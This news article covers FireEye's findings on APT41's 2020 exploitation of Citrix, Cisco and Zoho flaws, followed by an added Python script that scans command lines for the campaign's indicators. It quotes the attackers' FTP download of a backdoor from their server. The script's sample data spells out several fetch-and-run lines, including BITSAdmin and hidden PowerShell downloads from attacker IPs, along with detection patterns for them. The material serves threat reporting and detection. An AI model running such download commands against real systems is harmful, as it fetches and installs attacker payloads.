One of the more active Chinese cyberespionage and cybercrime groups recently conducted a widespread attack campaign that targeted companies in banking, defense, technology, and other sectors in at least 20 countries over the last three months.
APT41 began exploiting a handful of publicly known vulnerabilities in widely deployed enterprise and SMB products at the beginning of 2020, starting with a remote code execution flaw in the Citrix Application Delivery Controller and Citrix Gateway devices (CVE-2019-19781), according to researchers at FireEye who have tracked the campaign. The attackers later moved on to exploits for vulnerabilities in Cisco routers and Zoho ManageEngine Desktop Central, all of which had been publicly disclosed prior to the group’s attacks. The campaign targeted organizations around the world, including some in Australia, Canada, France, Japan, the UK and the United States.
This is somewhat unusual activity for APT41, which has an extensive arsenal of internally developed tools and exploits, but attack groups will generally take the path of least resistance and using public exploits qualifies. Last year, for example, FireEye discovered a separate intrusion by APT41 that involved the use of a publicly available exploit for a vulnerability in the Atlassian Confluence application. As in the 2020 campaign, that intrusion involved an initial compromise and then the use of second-stage payloads and backdoors.
The campaign that FireEye discovered this year began toward the end of January with exploitation of the Citrix flaw. Those intrusions began about 10 days after proof-of-concept exploit code for the vulnerability was publicly released.
“The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the mitigation wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step,” FireEye researchers said in a report on the campaign.
“Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).”
Interestingly, the APT41 activity against Citrix devices essentially stopped from Feb. 2 through Feb. 19, a lull that coincides with the start of COVID-19 quarantine measures in China. The Citrix activity picked up again around Feb. 24, and in the same period the attackers also began exploiting a known flaw in Cisco RV320 routers. The FireEye researchers weren’t able to identify the specific exploit that APT41 used against the routers, but noted that there is a public Metasploit module that includes an exploit for the vulnerability.
Shortly after that, the APT41 team turned to a recently disclosed vulnerability in Zoho ManageEngine Desktop Central (CVE-2020-10189), exploiting it at a number of different organizations. Like the Citrix and Cisco flaws, it was not a zero day: the vulnerability and proof-of-concept code had been made public before APT41 began using it.
“Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed,” the FireEye report says.
“In the first variation the CVE-2020-10189 exploit was used to directly upload ‘logger.zip’, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.”
In the first variation, APT41 likely used a public PoC exploit as the basis for its operation; in the second, the group used Microsoft’s BITSAdmin command-line tool to download install.bat from a server known to be operated by APT41. In both cases the attackers installed a trial version of the Cobalt Strike Beacon threat emulation tool, and then used Beacon to download a second-stage backdoor.
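As an added example that is not part of this article or of FireEye’s report, the script below turns the indicators quoted above from both the Citrix activity (the ‘file /bin/pwd’ probe and the FTP download into /tmp from 66.42.98[.]220) and the Zoho activity (the source IP 91.208.184[.]78 and the payload names install.bat and storesyncsvc.dll) into a small triage routine for process command-line telemetry. Beyond exact indicator matches it also flags the behaviour behind them, so it would still fire on the same tradecraft from new infrastructure: a command-line FTP client writing into /tmp with credentials embedded in the URL, a PowerShell download cradle, or a BITSAdmin transfer. The sample command lines and the password in them are constructed for this example, and the behavioural patterns and severity scheme are this example’s own assumptions, not FireEye detection rules.

```python
import re
from dataclasses import dataclass, field

# Indicators quoted in the article (defanged as published).
def refang(ioc: str) -> str:
    """Turn a defanged indicator such as 66.42.98[.]220 back into a matchable string."""
    return ioc.replace("[.]", ".")

APT41_IPS = {refang("66.42.98[.]220"), refang("91.208.184[.]78")}
APT41_FILES = {"bsd", "install.bat", "storesyncsvc.dll", "logger.zip"}
RECON_PROBE = "file /bin/pwd"

# Behavioural patterns. These are this example's own heuristics, not FireEye rules.
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
FTP_CREDS_URL = re.compile(r"ftp://(?P<user>[^:/@\s]+):(?P<pw>[^@\s]+)@(?P<host>[\w.\-]+)/?(?P<path>\S*)")
FTP_TO_TMP = re.compile(r"(?:^|[\s/])ftp\s+-o\s+/tmp/\S+")
PS_DOWNLOAD = re.compile(r"powershell.*?(?:DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b)", re.I)
BITS_TRANSFER = re.compile(r"bitsadmin(?:\.exe)?\s+/transfer", re.I)


@dataclass
class Finding:
    cmdline: str            # command line with any embedded password masked
    severity: str           # "high" = published infrastructure/file names, "medium" = behaviour only
    reasons: list = field(default_factory=list)


def mask_credentials(cmd: str) -> str:
    """Redact the password in user:pass@host FTP URLs before the line is logged or shared."""
    return FTP_CREDS_URL.sub(
        lambda m: f"ftp://{m['user']}:[redacted]@{m['host']}/{m['path']}", cmd)


def triage(cmd: str):
    """Return a Finding for a suspicious command line, or None for a clean one."""
    ioc_hits, behaviour = [], []

    for ip in set(IP_RE.findall(cmd)):
        if ip in APT41_IPS:
            ioc_hits.append(f"known APT41 infrastructure {ip}")
    for name in sorted(APT41_FILES):
        # Match the bare file name, not substrings of other names (e.g. 'freebsd').
        if re.search(rf"(?<![\w.]){re.escape(name)}\b", cmd):
            ioc_hits.append(f"campaign file name {name}")

    if RECON_PROBE in cmd:
        behaviour.append("'file /bin/pwd' probe seen in the first CVE-2019-19781 exploitation attempts")
    if FTP_CREDS_URL.search(cmd):
        behaviour.append("credentials embedded in an FTP URL")
    if FTP_TO_TMP.search(cmd):
        behaviour.append("ftp download into /tmp")
    if PS_DOWNLOAD.search(cmd):
        behaviour.append("PowerShell download cradle")
    if BITS_TRANSFER.search(cmd):
        behaviour.append("BITSAdmin transfer")

    if not ioc_hits and not behaviour:
        return None
    return Finding(mask_credentials(cmd), "high" if ioc_hits else "medium", ioc_hits + behaviour)


def scan(cmdlines):
    """Triage a batch of process command lines (e.g. from auditd or EDR telemetry)."""
    return [f for f in (triage(c) for c in cmdlines) if f is not None]


# Constructed sample telemetry for this example; the FTP password is made up.
SAMPLE_CMDLINES = [
    "file /bin/pwd",
    "/usr/bin/ftp -o /tmp/bsd ftp://test:Hunter2@66.42.98.220/bsd",
    "bitsadmin /transfer job http://66.42.98.220/install.bat C:\\Windows\\Temp\\install.bat",
    'powershell -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile(\'http://91.208.184.78/install.bat\',\'install.bat\')"',
    "/usr/bin/ftp -o /tmp/patch.tgz ftp://anonymous:anon@mirror.example.net/patch.tgz",
    "file /usr/bin/python3",
    "ls -la /var/log",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"[{f.severity}] {f.cmdline}")
        for r in f.reasons:
            print("   -", r)
```

Run against the constructed sample, the first five lines are flagged and the last two are not; the anonymous-FTP line comes back as a medium-severity behavioural hit only, which is the point of keeping the behavioural patterns separate from the published indicators. The password in the FTP URL is masked in the stored finding so that the telemetry can be shared without leaking the attacker’s (or a victim’s) credentials.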
“It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance,” FireEye’s report says.